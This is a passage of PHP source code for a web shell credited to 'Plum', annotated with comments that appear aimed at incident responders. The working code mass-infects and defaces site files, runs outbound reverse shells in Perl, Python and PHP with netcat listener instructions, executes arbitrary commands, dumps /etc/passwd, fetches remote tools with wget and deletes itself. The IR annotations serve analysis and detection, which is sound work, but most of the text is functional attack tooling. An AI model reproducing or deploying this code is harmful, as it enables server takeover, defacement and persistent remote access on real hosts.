    <input type='submit' name='generate_hashes' value='Hash'>
    </form>
    </center>";
}
if(isset($_POST['generate_hashes'])) {
    $string = $_POST['string'];
    $md5 = md5($string);
    $md52 = md5(md5($string));
    $md53 = md5(md5(md5($string)));
    $sha1 = sha1($string);
    $sha12 = sha1(sha1($string));
    $sha13 = sha1(sha1(sha1($string)));
    // Salt lengths are passed as strings; salt_gen() compares them numerically.
    $joomlasalt = salt_gen("4");
    $joomlahash = md5($string.$joomlasalt);
    $oscommsalt = salt_gen("2");
    $oscommhash = md5($oscommsalt.$string);
    $vbsalt = salt_gen("3");
    $vbhash = md5(md5($string).$vbsalt);
    $vbsalt2 = salt_gen("30");
    $vbhash2 = md5(md5($string).$vbsalt2);
    $mybbsalt = salt_gen("8");
    $mybbhash = md5(md5($mybbsalt).md5($string));
    $mybbsalt2 = salt_gen("8");
    $mybbhash2 = md5(md5($mybbsalt2).$string);
    $ipbsalt = salt_gen("5");
    $ipbhash = md5(md5($ipbsalt).md5($string));
    echo "<center>
    <textarea cols='120' rows='25' readonly>";
    echo 'md5($pass): '.$md5."\n";
    echo 'md5(md5($pass)): '.$md52."\n";
    echo 'md5(md5(md5($pass))): '.$md53."\n";
    echo 'sha1($pass): '.$sha1."\n";
    echo 'sha1(sha1($pass)): '.$sha12."\n";
    echo 'sha1(sha1(sha1($pass))): '.$sha13."\n";
    echo 'md5($pass.$salt) (Joomla): '.$joomlahash.':'.$joomlasalt."\n";
    echo 'md5($salt.$pass) (osCommerce): '.$oscommhash.':'.$oscommsalt."\n";
    echo 'md5(md5($pass).$salt) (vBulletin < 3.8.5): '.$vbhash.':'.$vbsalt."\n";
    echo 'md5(md5($pass).$salt) (vBulletin >= 3.8.5): '.$vbhash2.':'.$vbsalt2."\n";
    echo 'md5(md5($salt).$pass) (MyBB < 1.2): '.$mybbhash2.':'.$mybbsalt2."\n";
    echo 'md5(md5($salt).md5($pass)) (MyBB 1.2+): '.$mybbhash.':'.$mybbsalt."\n";
    echo 'md5(md5($salt).md5($pass)) (IPB 2+): '.$ipbhash.':'.$ipbsalt."\n";
    echo "</textarea>
    </center>";
}
744
//Extract files
// GET-triggered archive extraction: ?extract=<archive>&epath=<target dir>&type=<zip|tar|
// gz|tgz|rar>. All three values go to extract_file() unchecked; see that function for the
// shell-command fallbacks they end up in. An unknown type silently does nothing.
if(isset($_GET['extract'])) {
    $file = $_GET['extract'];
    $epath = $_GET['epath'];
    $type = $_GET['type'];
    extract_file($file, $epath, $type);
}
752
//Infect files
// Mass "infect": prepends the POSTed code to the start of every file under the chosen
// directory whose extension is exactly "php", exactly "html", or either (case-sensitive;
// .phtml/.php5/.htm/.PHP are untouched, and dot-prefixed paths are skipped by
// mass_files()). Unlike the deface handler there is no `$files != __FILE__` guard, so the
// shell itself is prepended to when it lives under $infdir.
// IR notes: every touched file gets a new mtime and the same byte sequence at offset 0,
// so the injected prefix is easy to grep for across the tree; the per-file success/failure
// lines echoed here are the operator's only record of what changed.
if(isset($_POST['do_infect'])) {
    $infdir = rtrim($_POST['infect_dir'], '/');
    $type = $_POST['infect_type'];
    $infcode = $_POST['infect_code'];
    if(is_dir($infdir)) {
        $success = 0;
        $failed = 0;
        foreach(mass_files($infdir, false) as $key => $files) {
            $exten = pathinfo($files, PATHINFO_EXTENSION);
            if($type == 'php') {
                if($exten == 'php') {
                    $content = $infcode;
                    $content .= file_get_contents($files);
                    if(file_put_contents($files, $content)) {
                        echo "<font color='green'><b>Successfully infected file: $files</b></font></br>";
                        $success++;
                    } else {
                        echo "<font color='red'><b>Failed to infect file: $files</b></font></br>";
                        $failed++;
                    }
                }
            } elseif($type == 'html') {
                if($exten == 'html') {
                    $content = $infcode;
                    $content .= file_get_contents($files);
                    if(file_put_contents($files, $content)) {
                        echo "<font color='green'><b>Successfully infected file: $files</b></font></br>";
                        $success++;
                    } else {
                        echo "<font color='red'><b>Failed to infect file: $files</b></font></br>";
                        $failed++;
                    }
                }
            } elseif($type == 'both') {
                if($exten == 'html' or $exten == 'php') {
                    $content = $infcode;
                    $content .= file_get_contents($files);
                    if(file_put_contents($files, $content)) {
                        echo "<font color='green'><b>Successfully infected file: $files</b></font></br>";
                        $success++;
                    } else {
                        echo "<font color='red'><b>Failed to infect file: $files</b></font></br>";
                        $failed++;
                    }
                }
            }
        }
        echo "A total of $success files were infected!<br>A total of $failed files failed to be infected!";
    } else {
        error("$infdir is not a valid directory!");
    }
}
// Infect form; the directory defaults to DOCUMENT_ROOT.
if(isset($_GET['fileInfect'])) {
    echo "<center>
    This will append your infect code to the top of every file in the given directory.<br>
    <form action='' method='post'>
    Directory to infect: <input type='text' name='infect_dir' value='$rootdir'>
    File types to infect:
    <select name='infect_type'>
        <option value='php'>PHP</option>
        <option value='html'>HTML</option>
        <option value='both'>Both</option>
    </select><br>
    Code to infect files with:<br>
    <textarea name='infect_code' cols='110' rows='20'></textarea><br>
    <input type='submit' name='do_infect' value='Infect'>
    </form>
    </center>";
}
823
//Deface files
// Mass deface: overwrites every matching .php/.html file under the chosen directory with
// the POSTed source (same extension matching and dot-skipping as the infect handler).
// The `$files != __FILE__` guard is a plain string comparison between the path that
// mass_files() builds from the POSTed directory and the absolute __FILE__, so it only
// protects the shell when the submitted directory spells its location exactly; a
// relative or differently-written path would let the shell overwrite itself.
// IR notes: overwritten files all share one size/content and a tight mtime window; the
// original content is gone (no backup is taken), so recovery is from backups or VCS.
if(isset($_POST['do_deface'])) {
    $defdir = rtrim($_POST['deface_dir'], '/');
    $type = $_POST['deface_type'];
    $defsource = $_POST['deface_source'];
    if(is_dir($defdir)) {
        $success = 0;
        $failed = 0;
        foreach(mass_files($defdir, false) as $key => $files) {
            $exten = pathinfo($files, PATHINFO_EXTENSION);
            if($type == 'php') {
                if($exten == 'php') {
                    if($files != __FILE__) {
                        if(file_put_contents($files, $defsource)) {
                            echo "<font color='green'><b>Successfully defaced file: $files</b></font></br>";
                            $success++;
                        } else {
                            echo "<font color='red'><b>Failed to deface file: $files</b></font></br>";
                            $failed++;
                        }
                    }
                }
            } elseif($type == 'html') {
                if($exten == 'html') {
                    if($files != __FILE__) {
                        if(file_put_contents($files, $defsource)) {
                            echo "<font color='green'><b>Successfully defaced file: $files</b></font></br>";
                            $success++;
                        } else {
                            echo "<font color='red'><b>Failed to deface file: $files</b></font></br>";
                            $failed++;
                        }
                    }
                }
            } elseif($type == 'both') {
                if($exten == 'html' or $exten == 'php') {
                    if($files != __FILE__) {
                        if(file_put_contents($files, $defsource)) {
                            echo "<font color='green'><b>Successfully defaced file: $files</b></font></br>";
                            $success++;
                        } else {
                            echo "<font color='red'><b>Failed to deface file: $files</b></font></br>";
                            $failed++;
                        }
                    }
                }
            }
        }
        echo "A total of $success files were defaced!<br>A total of $failed files failed to be defaced!";
    } else {
        error("$defdir is not a valid directory!");
    }
}
// Deface form; the directory defaults to DOCUMENT_ROOT.
if(isset($_GET['fileDeface'])) {
    echo "<center>
    This will deface every file in the given directory. This will not deface this shell.<br>
    <form action='' method='post'>
    Directory to deface: <input type='text' name='deface_dir' value='$rootdir'>
    File types to deface:
    <select name='deface_type'>
        <option value='php'>PHP</option>
        <option value='html'>HTML</option>
        <option value='both'>Both</option>
    </select><br>
    Source to deface files with:<br>
    <textarea name='deface_source' cols='110' rows='20'></textarea><br>
    <input type='submit' name='do_deface' value='Deface'>
    </form>
    </center>";
}
894
//Install MSD
// Drops a second tool (MySQL Dumper) onto the host. The zip is fetched server-side over
// plain HTTP from the Dropbox URL in $links with file_get_contents() (requires
// allow_url_fopen), written into the POSTed directory as msdv2.zip or msd1.24.4.zip, and
// unpacked with extract_file(). The zip branch of extract_file() does not delete the
// archive, so both the zip and the extracted tree (default location "<dir>/msd") remain
// on disk as artefacts. The MD5 recorded in $links is never compared before extraction.
// A missing target directory is created with mode 0777 (subject to umask).
// The three error() calls use single-quoted strings, so they print the literal text
// "$msd1dir" instead of the path.
if(isset($_POST['install_msd'])) {
    if($_POST['version'] == "1") {
        $msd1link = $links['MSD1']['LINK'];
        $name = "msdv2.zip";
    } else {
        $msd1link = $links['MSD2']['LINK'];
        $name = "msd1.24.4.zip";
    }
    $msd1dir = rtrim($_POST['msd_dir'], '/');
    if(is_dir($msd1dir)) {
        $get = file_get_contents($msd1link);
        if(file_put_contents("$msd1dir/$name", $get)) {
            extract_file("$msd1dir/$name", $msd1dir, "zip");
        } else {
            error('Failed to write zip file to $msd1dir!');
        }
    } else {
        if(mkdir($msd1dir, 0777)) {
            $get = file_get_contents($msd1link);
            if(file_put_contents("$msd1dir/$name", $get)) {
                extract_file("$msd1dir/$name", $msd1dir, "zip");
            } else {
                error('Failed to write zip file to $msd1dir!');
            }
        } else {
            error('Failed to make directory $msd1dir!');
        }
    }
}
// Install forms; the hidden "version" field picks MSD1 (value 1) or MSD2 (anything else).
if(isset($_GET['installMSD'])) {
    echo "<center>
    <form action='' method='post'>
    <font size='4'>MySQL Dumper v2.1 By Plum</font><br>
    Directory to install to. If it doesn't exist it will try and create it.<br>
    <input type='text' name='msd_dir' value='$dir/msd' size='50'>
    <input type='hidden' name='version' value='1'>
    <input type='submit' name='install_msd' value='Install'>
    </form>
    </center>";
}
if(isset($_GET['installMSD2'])) {
    echo "<center>
    <form action='' method='post'>
    <font size='4'>MySQL Dumper v1.24.4 By <a href='http://www.mysqldumper.net/'>http://www.mysqldumper.net/</a></font><br>
    Directory to install to. If it doesn't exist it will try and create it.<br>
    <input type='text' name='msd_dir' value='$dir/msd' size='50'>
    <input type='hidden' name='version' value='2'>
    <input type='submit' name='install_msd' value='Install'>
    </form>
    </center>";
}
947
//Back connect
// Perl reverse shell. Connect step: runs `perl /tmp/bc.pl <ip> <port>` with the POSTed
// values dropped into the command line unquoted. exe_cmd() waits for the child's
// stdout/stderr pipes to close, so the HTTP request stays open at least until the
// script detaches or exits. Default port is 2121 (see the form below).
if(isset($_POST['bcpl_connect'])) {
    $ip = $_POST['bcpl_ip'];
    $port = $_POST['bcpl_port'];
    if(can_exe()) {
        if(file_exists("/tmp/bc.pl")) {
            echo "<center>
            Trying to connect to $ip on port $port<br>
            The response from 'perl /tmp/bc.pl $ip $port' was:<br>
            <textarea cols='120' rows='25'>".exe_cmd("perl /tmp/bc.pl $ip $port")."</textarea>
            </center>";
        } else {
            error("/tmp/bc.pl does not exist!");
        }
    } else {
        error("Can not execute commands! A Perl script needs to be ran to spawn this reverse shell!");
    }
}
// Stage step: merely OPENING the tab (GET ?bcPerl) base64-decodes $bcpl and writes it to
// /tmp/bc.pl, before any connect button is pressed. That file is a host artefact even if
// no connection was ever attempted. The IP field defaults to the requester's REMOTE_ADDR.
if(isset($_GET['bcPerl'])) {
    if(can_exe()) {
        if(is_dir('/tmp')) {
            if(file_put_contents('/tmp/bc.pl', base64_decode($bcpl))) {
                success("Successfully wrote /tmp/bc.pl!");
                echo "<center>
                <form action='' method='post'>
                IP: <input type='text' name='bcpl_ip' value='$yourip'>
                Port: <input type='text' name='bcpl_port' value='2121' size='3'>
                <input type='submit' name='bcpl_connect' value='Connect'><br>
                Use: 'nc -l -v -p PORT' Remember your port must be forwarded!
                </form>
                </center>";
            } else {
                error("Failed to write Perl source to /tmp/bc.pl!");
            }
        } else {
            error('/tmp is not a directory!');
        }
    } else {
        error("Can not execute commands! A Perl script needs to be ran to spawn this reverse shell!");
    }
}
989
//Python back-connect, step 2: same flow as the Perl handler above, running
//'python /tmp/bc.py <ip> <port>' through exe_cmd() with the POSTed values unmodified.
990if(isset($_POST['bcpy_connect'])) {
991 $ip = $_POST['bcpy_ip'];
992 $port = $_POST['bcpy_port'];
993 if(can_exe()) {
994 if(file_exists("/tmp/bc.py")) {
995 echo "<center>
996 Trying to connect to $ip on port $port<br>
997 The response from 'python /tmp/bc.py $ip $port' was:<br>
998 <textarea cols='120' rows='25'>".exe_cmd("python /tmp/bc.py $ip $port")."</textarea>
999 </center>";
1000 } else {
1001 error("/tmp/bc.py does not exist!");
1002 }
1003 } else {
1004 error("Can not execute commands! A Python script needs to be ran to spawn this reverse shell!");
1005 }
1006}
//Python back-connect, step 1: decode the embedded $bcpy payload (defined elsewhere) into
//the file /tmp/bc.py — that path is the on-disk artifact. The success and failure messages
//name "/tmp/by.py"; that is a typo in the message text only, the path written is /tmp/bc.py.
1007if(isset($_GET['bcPython'])) {
1008 if(can_exe()) {
1009 if(is_dir("/tmp")) {
1010 if(file_put_contents('/tmp/bc.py', base64_decode($bcpy))) {
1011 success("Successfully wrote /tmp/by.py");
1012 echo "<center>
1013 <form action='' method='post'>
1014 IP: <input type='text' name='bcpy_ip' value='$yourip'>
1015 Port: <input type='text' name='bcpy_port' value='2121' size='3'>
1016 <input type='submit' name='bcpy_connect' value='Connect'><br>
1017 Use 'nc -l -v -p PORT' Remember your port must be forwarded!
1018 </form>
1019 </center>";
1020 } else {
1021 error("Failed to write Python source to /tmp/by.py");
1022 }
1023 } else {
1024 error("/tmp is not a directory!");
1025 }
1026 } else {
1027 error("Can not execute commands! A Python script needs to be ran to spawn this reverse shell!");
1028 }
1029}
1030
//PHP back-connect: nothing is dropped to disk; the PHP worker itself opens an outbound
//TCP connection to the POSTed ip:port and serves a command loop over it.
1031if(isset($_POST['bcphp_connect'])) {
1032 $ip = $_POST['bcphp_ip'];
1033 $port = $_POST['bcphp_port'];
1034 echo "<center>Trying to connect!</center>";
1035 $sockopen = fsockopen($ip , $port , $errno, $errstr);
 //fsockopen() returns false on failure, so the !$sockopen branch already covers the
 //error case; the $errno != 0 branch is effectively unreachable.
1036 if(!$sockopen) {
1037 error("Failed to open socket!");
1038 } elseif($errno != 0) {
1039 error("$errno: $errstr");
1040 } else {
 //Banner plus 'uname -a' / 'id' output are sent first; then each line read from the
 //peer is handed to exe_cmd() and its output written back. The request blocks in this
 //loop until the peer closes, i.e. a long-lived PHP worker holding an outbound socket.
1041 fputs($sockopen, "\n[+]PHP Back Connection[+]\n\n");
1042 $uname = exe_cmd("uname -a");
1043 $id = exe_cmd("id");
1044 fputs($sockopen, "$uname$id\n");
1045 while(!feof($sockopen)) {
1046 fputs($sockopen, "> ");
1047 $command = fgets($sockopen);
1048 fputs($sockopen , exe_cmd($command));
1049 }
1050 fclose($sockopen);
1051 }
1052}
//Connect form for the PHP back-connect; shown only when can_exe() reports commands can run.
1053if(isset($_GET['bcPHP'])) {
1054 if(can_exe()) {
1055 echo "<center>
1056 <form action='' method='post'>
1057 IP: <input type='text' name='bcphp_ip' value='$yourip'>
1058 Port: <input type='text' name='bcphp_port' value='2121' size='3'>
1059 <input type='submit' name='bcphp_connect' value='Connect'><br>
1060 Use 'nc -l -v -p PORT' Remember your port must be forwarded!
1061 </form>
1062 </center>";
1063 } else {
1064 error("Can not execute commands! Commands need to be executed for this reverse shell to work!");
1065 }
1066}
1067
1068//System stuff
//Dump /etc/passwd as an HTML table, one <td> per colon-separated field of each line.
//Field values are echoed without HTML escaping.
1069if(isset($_GET['users'])) {
1070 if(file_exists('/etc/passwd')) {
1071 $getfile = file_get_contents('/etc/passwd');
1072 $exline = explode("\n", $getfile);
1073 echo "<table>
1074 <tr>
1075 <th>Username</th>
1076 <th>Password?</th>
1077 <th>UID</th>
1078 <th>GID</th>
1079 <th>UID Info</th>
1080 <th>Home Directory</th>
1081 <th>Command/Shell</th>
1082 </tr>";
1083 foreach($exline as $exl) {
1084 echo "<tr>";
1085 $excol = explode(":", $exl);
1086 foreach($excol as $exc) {
1087 echo "<td>$exc</td>";
1088 }
1089 echo "</tr>";
1090 }
1091 echo "</table>";
1092 } else {
1093 error("/etc/passwd does not exist!");
1094 }
1095}
1096
//Process table from 'ps aux' (the header line is dropped via substr/strpos). Each row
//gets a kill link keyed 'killProccess' (sic); the kill handler further down reads
//$_GET['killProcess'], so these links never reach it.
1097if(isset($_GET['processes'])) {
1098 if(can_exe()) {
1099 $processes = exe_cmd("ps aux");
1100 $stripfirstline = substr($processes, strpos($processes, "\n")+1);
1101 $exline = explode("\n", $stripfirstline);
1102 echo "<div id='hover'>
1103 <table width='100%' border='1'>
1104 <tr>
1105 <th>Kill</th>
1106 <th>USER</th>
1107 <th>PID</th>
1108 <th>%CPU</th>
1109 <th>%MEM</th>
1110 <th>VSZ</th>
1111 <th>RSS</th>
1112 <th>TTY</th>
1113 <th>STAT</th>
1114 <th>START</th>
1115 <th>TIME</th>
1116 <th>COMMAND</th>
1117 </tr>";
1118 foreach($exline as $exl) {
1119 echo "<tr>";
 //Split on single spaces and drop empty tokens; $exsp[1] (the PID column) is read
 //even for lines that produce fewer tokens, e.g. the trailing empty line.
1120 $exsp = array_values(array_filter(explode(" ", $exl), 'strlen'));
 //Tokens past the 10th are re-joined because COMMAND may itself contain spaces.
1121 if(count($exsp) > 11) {
1122 $slice = array_slice($exsp, 0, 10);
1123 echo "<td><a href='?killProccess=".$exsp[1]."'>Kill</a></td>";
1124 foreach($slice as $s) {
1125 echo "<td>$s</td>";
1126 }
1127 $slice2 = array_slice($exsp, 10);
1128 echo "<td>".implode(" ", $slice2)."</td>";
1129 } else {
1130 echo "<td><a href='?killProccess=".$exsp[1]."'>Kill</a></td>";
1131 foreach($exsp as $e) {
1132 echo "<td>$e</td>";
1133 }
1134 }
1135 echo "</tr>";
1136 }
1137 echo "</table></div>";
1138 } else {
1139 error("Can not execute commands! Must execute 'ps aux' to get processes.");
1140 }
1141}
1142
//Memory page: raw /proc/meminfo, then disk usage of "/" (ByteConversion() is defined
//elsewhere in the file). $hddpercent divides by $hddtotal unguarded; disk_total_space()
//returns false when the path cannot be read.
1143if(isset($_GET['memory'])) {
1144 if(file_exists('/proc/meminfo')) {
1145 $raminfo = file_get_contents('/proc/meminfo');
1146 echo "Ram:<br><pre>$raminfo</pre><br><br>";
1147 } else {
1148 error("/proc/meminfo does not exist!");
1149 }
1150 $hddfree = disk_free_space("/");
1151 $hddtotal = disk_total_space("/");
1152 $hddused = $hddtotal - $hddfree;
1153 $hddpercent = round(($hddused / $hddtotal) * 100);
1154 echo "HDD:<br>Total Space: ".ByteConversion($hddtotal)."<br>Free Space: ".ByteConversion($hddfree)."<br>Used Space: ".ByteConversion($hddused)."<br>Percent Used: ~$hddpercent%";
1155}
1156
//CPU page: raw /proc/cpuinfo inside a textarea.
1157if(isset($_GET['cpu'])) {
1158 if(file_exists('/proc/cpuinfo')) {
1159 $cpuinfo = file_get_contents('/proc/cpuinfo');
1160 echo "<center>
1161 CPU Information:<br>
1162 <textarea cols='120' rows='20'>$cpuinfo</textarea>
1163 </center>";
1164 } else {
1165 error('/proc/cpuinfo does not exist!');
1166 }
1167}
1168
1169//Execute command
//Generic command handler for the 'Execute Command' form at the bottom of the page: the
//POSTed 'command' is passed to exe_cmd() (defined elsewhere) and both the command and its
//output are echoed back unescaped.
1170if(isset($_POST['exe_cmd'])) {
1171 $command = $_POST['command'];
1172 if(can_exe()) {
1173 echo "<center>
1174 <form action='' method='post'>
1175 <input type='text' name='command' size='75'>
1176 <input type='submit' name='exe_cmd'>
1177 </form>
1178 The response from '$command' was:<br>
1179 <textarea cols='100' rows='20'>".exe_cmd($command)."</textarea>
1180 </center>";
1181 } else {
1182 error("Can not execute commands!");
1183 }
1184}
1185
1186//Create file
//Create an empty file at the POSTed path, then redirect to the editor. The handle from
//fopen() is neither stored nor closed; it is released when the request ends.
//redirect() is defined elsewhere in the file.
1187if(isset($_POST['create_file'])) {
1188 $createpath = $_POST['create_file_path'];
1189 if(!file_exists($createpath)) {
1190 if(fopen($createpath, "w+")) {
1191 redirect("?edit=$createpath");
1192 } else {
1193 error("Failed to create file!");
1194 }
1195 } else {
1196 error("File already exists! You can view it <a href='?edit=$createpath'>here</a>.");
1197 }
1198}
1199//Create directory at the POSTed path with mode 0777 (still subject to the process umask),
//then redirect into it.
1200if(isset($_POST['create_dir'])) {
1201 $dirpath = $_POST['create_dir_path'];
1202 if(!is_dir($dirpath)) {
1203 if(mkdir($dirpath, 0777)) {
1204 redirect("?dir=$dirpath");
1205 } else {
1206 error("Failed to make directory!");
1207 }
1208 } else {
1209 error("This directory already exists! You can view it <a href='?dir=$dirpath'>here</a>.");
1210 }
1211}
1212
1213//wget file
//Fetch a URL with the system 'wget' through exe_cmd(); the POSTed URL is interpolated
//into the shell command unmodified and wget's output is shown in a textarea.
1214if(isset($_POST['do_wget'])) {
1215 $fileurl = $_POST['wget_file'];
1216 if(can_exe()) {
1217 echo "<center>
1218 The response from 'wget $fileurl' was:<br>
1219 <textarea cols='120' rows='20'>".exe_cmd("wget $fileurl")."</textarea>
1220 </center>";
1221 } else {
1222 error("Commands can not be executed!");
1223 }
1224}
1225
1226//Upload file: move the browser-supplied file to "$uploaddir/$uploadname", keeping the
//client's original filename. The 'already exists' link omits the '/' separator that the
//file_exists()/move_uploaded_file() paths use.
1227if(isset($_POST['do_upload'])) {
1228 $uploaddir = $_POST['upload_dir'];
1229 $uploadname = $_FILES['upload_file']['name'];
1230 if(!file_exists("$uploaddir/$uploadname")) {
1231 if(move_uploaded_file($_FILES['upload_file']['tmp_name'], "$uploaddir/$uploadname")) {
1232 redirect("?dir=$uploaddir");
1233 } else {
1234 error("Failed to upload file!");
1235 }
1236 } else {
1237 error("File already exists! You can view it <a href='?edit=$uploaddir$uploadname'>here</a>.");
1238 }
1239}
1240
1241//Mass files
//Mass action on the checked 'massbox[]' paths from the listing form below. 'delete' uses
//rmdir() for directories (only empty ones succeed) and unlink() for files; 'chmod' applies
//the POSTed 'chmod_value' as-is. $checked is iterated without checking that any box was sent.
1242if(isset($_POST['mass_action'])) {
1243 $action = $_POST['action'];
1244 $checked = $_POST['massbox'];
1245 if($action == 'delete') {
1246 foreach($checked as $c) {
1247 if(is_dir($c)) {
1248 if(rmdir($c)) {
1249 echo "<font color='green'><b>Successfully deleted directory: $c</font><br>";
1250 } else {
1251 echo "<font color='red'><b>Failed to delete directory: $c</font><br>";
1252 }
1253 } else {
1254 if(unlink($c)) {
1255 echo "<font color='green'><b>Successfully deleted file: $c</font><br>";
1256 } else {
1257 echo "<font color='red'><b>Failed to delete file: $c</font><br>";
1258 }
1259 }
1260 }
1261 } elseif($action == 'chmod') {
1262 $chvalue = $_POST['chmod_value'];
1263 foreach($checked as $c) {
 //Both outcomes are printed in red here, unlike the delete branch's green success line.
1264 if(chmod($c, $chvalue)) {
1265 echo "<font color='red'><b>Successfully chmod'd file: $c to: $chvalue</font><br>";
1266 } else {
1267 echo "<font color='red'><b>Failed to chmod file: $c to: $chvalue</font><br>";
1268 }
1269 }
1270 } else {
1271 error('Invalid action specified!');
1272 }
1273}
1274
1275//Display disabled functions
//List the comma-separated entries of $disabledfunc (defined elsewhere; presumably the
//disable_functions ini value — TODO confirm).
1276if(isset($_GET['disabledFunctions'])) {
1277 echo "Disabled functions:<br>";
1278 $ex = explode(",", $disabledfunc);
1279 foreach($ex as $e) {
1280 echo "$e<br>";
1281 }
1282}
1283
1284//Kill process. posix_kill() takes (pid, signal) but is called with one argument, so
//depending on PHP version this is a warning-and-null or an ArgumentCountError — no signal
//is sent either way. The process table above also links with a differently spelled key
//('killProccess'), so this branch is unlikely to be reached from the UI at all.
1285if(isset($_GET['killProcess'])) {
1286 $id = $_GET['killProcess'];
1287 if(posix_kill($id)) {
1288 success("Successfully killed process: $id");
1289 } else {
1290 error("Failed to kill process: $id");
1291 }
1292}
1293
1294//Check links
//Link checker over $links (defined elsewhere; each entry carries LINK, MD5 and DESC).
//Both checks make outbound requests from the web server: get_headers() and md5_file()
//each fetch the URL. The status test is 'A != x or A != y', which is true for every
//value of A, so the Status column always reads OK.
1295if(isset($_GET['checkLinks'])) {
1296 echo "<table border='1'>
1297 <tr>
1298 <th>Link</th>
1299 <th>Status</th>
1300 <th>MD5</th>
1301 <th>Description</td>
1302 </tr>";
1303 foreach($links as $key => $ar) {
1304 $link = $ar['LINK'];
1305 $md5 = $ar['MD5'];
1306 $desc = $ar['DESC'];
 //'@' hides the warning get_headers() emits when the host is unreachable; $headers is
 //then false and $headers[0] is null.
1307 $headers = @get_headers($link);
1308 echo "<tr>";
1309 echo "<td><a href='$link'>$link</a></td>";
1310 if($headers[0] != "HTTP/1.1 403 FORBIDDEN" or $headers[0] != "HTTP/1.1 404 Not Found") {
1311 echo "<td><font color='green'><b>OK</b></font></td>";
1312 } else {
1313 echo "<td><font color='red'><b>Not Found</b></font></td>";
1314 }
 //Second remote fetch of the same URL; compared loosely (==) against the stored MD5.
1315 if(md5_file($link) == $md5) {
1316 echo "<td><font color='green'><b>Match</b></font></td>";
1317 } else {
1318 echo "<td><font color='red'><b>No Match</b></font></td>";
1319 }
1320 echo "<td>$desc</td>";
1321 echo "</tr>";
1322 }
1323 echo "</table>";
1324}
1325
1326//Credits
//Credits page. $version is defined elsewhere in the file.
1327if(isset($_GET['credits'])) {
1328 echo "<center>
1329 <font size='6'><b>PHP Shell v$version</font></b><br>
1330 Written By: Plum (@PlumLulz or plumm@jabber.org)<br>
1331 Nav Bar: Bootstrap (<a href='http://getbootstrap.com/'>http://getbootstrap.com/</a>)<br>
1332 MySQL Dumper v2.1: Plum (@PlumLulz or plumm@jabber.org)<br>
1333 MySQL Dumper 1.24.4: <a href='http://mysqldumper.net'>http://mysqldumper.net</a><br>
1334 Perl Reverse Shell: pentestmonkey@pentestmonkey.net<br>
1335 Python Reverse Shell: Xavier Garcia (<a href='http://www.shellguardians.com'>http://www.shellguardians.com</a>)<br>
1336 I think that is about it. Enjoy!
1337 </center>";
1338}
1339
1340//Kill: self-delete — unlink() removes this script from disk. For responders this is why
//the file may be absent after the fact; the triggering request ('?kill') would still be
//in the web server's access log, and anything dropped under /tmp by the branches above
//is not removed here.
1341if(isset($_GET['kill'])) {
1342 if(unlink(__FILE__)) {
1343 success("Successfully killed shell!");
1344 } else {
1345 error("Failed to kill shell!");
1346 }
1347}
1348
1349//Let's get the files and directories for the current dir
//Read the entries of $dir into two lists (directories and files), skipping '.' and '..'.
//The directory handle is never closed. Note: 'while ($file = readdir(...))' stops early on
//an entry literally named "0", since that string is falsy in PHP. asort() sorts by value
//and keeps the original keys.
1350$open = opendir($dir);
1351$files = array();
1352$direcs = array();
1353while ($file = readdir($open)) {
1354 if ($file != "." && $file != "..") {
1355 if (is_dir("$dir/$file")) {
1356 array_push($direcs, $file);
1357 } else {
1358 array_push($files, $file);
1359 }
1360 }
1361}
1362asort($direcs);
1363asort($files);
1364
1365//Let's display those files and dirs
1366//Starting with directories first.
//Listing header. The breadcrumb turns each '/'-separated segment of $dir into a '?dir='
//link; $linkpath is built by concatenating onto a variable that is never initialised, and
//the '@' hides the resulting notice.
1367echo <<<html
1368<br><br>
1369<table width='100%' border='1'>
1370 <tr>
1371 <th>Current Directory:
1372html;
1373$ex = explode("/", $dir);
1374for ($p = 0; $p < count($ex); $p++) {
1375 @$linkpath.=$ex[$p] . '/';
1376 $linkpath2 = rtrim($linkpath, "/");
1377 echo "<a href='?dir=$linkpath2'>$ex[$p]</a>/";
1378}
//Column headers for the listing; the table sits inside the mass-action POST form.
1379echo <<<html
1380 </th>
1381 </tr>
1382</table>
1383
1384<form action='' method='post'>
1385 <div id="hover">
1386 <table width='100%' border='1'>
1387 <tr>
1388 <th>File/Dir Name</th>
1389 <th>Permissions</th>
1390 <th>Writeable</th>
1391 <th>Owner/Group</th>
1392 <th>Size</th>
1393 <th>Last Modified</th>
1394 <th>Delete</th>
1395 <th>Rename</th>
1396 <th>Mass</th>
1397 </tr>
1398html;
1399//Display directories
//One row per directory. $dir and entry names are interpolated into hrefs and form values
//without escaping. $perms is the octal mode with its leading two digits stripped; the
//owner/group columns show numeric ids, not names.
1400foreach($direcs as $dirs) {
1401 $perms = substr(base_convert(fileperms("$dir/$dirs"), 10, 8), 2);
1402 $writeable = is_writeable("$dir/$dirs") ? "<font color='green'><b>Writeable</b></font>" : "<font color='red'><b>Not Writeable</b></font>";
1403 $owner = fileowner("$dir/$dirs");
1404 $group = filegroup("$dir/$dirs");
1405 $size = "Directory";
1406 $lastmod = date("F d Y g:i:s", filemtime("$dir/$dirs"));
1407 echo <<<html
1408 <tr>
1409 <td><a href='?dir=$dir/$dirs'>$dirs</a></td>
1410 <td style="text-align: center;">$perms</td>
1411 <td style="text-align: center;">$writeable</td>
1412 <td style="text-align: center;">$owner/$group</td>
1413 <td>$size</td>
1414 <td>$lastmod</td>
1415 <td><a href='?delD=$dir/$dirs'>Delete</a></td>
1416 <td><a href='?rename=$dirs&rdir=$dir'>Rename</a></td>
1417 <td><input type='checkbox' name='massbox[]' value='$dir/$dirs'></td>
1418 </tr>
1419html;
1420}
1421
1422//Display files now: one row per file. Entries whose extension is in $compression
//(defined elsewhere) link to the '?extract' handler instead of '?edit'; in_array() here is
//non-strict. ByteConversion() is defined elsewhere in the file.
1423foreach($files as $file) {
1424 $perms = substr(base_convert(fileperms("$dir/$file"), 10, 8), 2);
1425 $writeable = is_writeable("$dir/$file") ? "<font color='green'><b>Writeable</b></font>" : "<font color='red'><b>Not Writeable</b></font>";
1426 $owner = fileowner("$dir/$file");
1427 $group = filegroup("$dir/$file");
1428 $size = ByteConversion(filesize("$dir/$file"));
1429 $lastmod = date("F d Y g:i:s", filemtime("$dir/$file"));
1430 $extension = pathinfo("$dir/$file", PATHINFO_EXTENSION);
1431 echo "<tr>";
1432 if(in_array($extension, $compression)) {
1433 echo "<td><a href='?extract=$dir/$file&epath=$dir&type=$extension'>$file</a></td>";
1434 } else {
1435 echo "<td><a href='?edit=$dir/$file'>$file</a></td>";
1436 }
1437 echo <<<html
1438 <td style="text-align: center;">$perms</td>
1439 <td style="text-align: center;">$writeable</td>
1440 <td style="text-align: center;">$owner/$group</td>
1441 <td>$size</td>
1442 <td>$lastmod</td>
1443 <td><a href='?delF=$dir/$file'>Delete</a></td>
